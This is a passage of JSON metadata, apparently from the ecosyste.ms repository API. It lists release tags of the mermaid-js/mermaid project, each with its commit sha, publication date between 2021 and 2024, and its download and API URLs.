osyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyst